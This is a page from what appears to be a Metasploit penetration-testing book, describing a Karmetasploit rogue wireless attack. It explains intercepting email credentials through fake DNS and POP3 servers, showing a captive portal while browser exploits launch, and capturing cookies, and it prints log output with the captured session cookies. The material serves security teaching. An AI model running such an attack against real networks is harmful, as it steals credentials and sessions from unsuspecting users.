182
Chapter 12
The POP3 server configured by Metasploit intercepts the target’s email
username and password at , because all DNS requests are intercepted by
the DNS server that Karmetasploit set up for us.
Getting a Shell
At this point, the user has no new messages, so he decides to do some web
browsing. When the browser opens, a
captive portal
is presented to the user,
as shown in Figure 12-1.
Figure 12-1: Karmetasploit captive portal
As the user sits in front of his computer wondering what’s going on,
Karmetasploit is busy configuring the attack to capture cookies; set up fake
email, DNS, and other servers; and launch exploits against the client’s browser—
all the result of the magic contained in our
karma.rc
file.
Of course, some degree of luck is involved in this attack. The browser
will display a “Loading” page while exploits are launched. If the user is impa-
tient, he may simply close the browser window, which will stop our exploits.
Next, you can see the massive amount of output that results from this attack:
[*] HTTP REQUEST 10.0.0.100 > www.microsoft.com:80 GET /isapi/redir.dll Windows IE 6.0
cookies=WT_NVR=0=/:1=downloads:2=downloads/en; WT_FPC=id=111.222.333.444-1008969152
.30063513:lv=1267703430218:ss=1267703362203;MC1=GUID=09633fd2bddcdb46a1fe62cc49fb4ac4&HASH=
d23f&LV=20103&V=3; A=I&I=AxUFAAAAAAAuBwAADSAT6RJMarfs902pHsnj0g!!; MUID=C7149D932C864
18EBC913CE45C4326AE
[*] Request '/ads' from 10.0.0.100:1371
[*] HTTP REQUEST 10.0.0.100 > adwords.google.com:80 GET /forms.html Windows IE 6.0 cookies=
[*] HTTP REQUEST 10.0.0.100 > blogger.com:80 GET /forms.html Windows IE 6.0 cookies=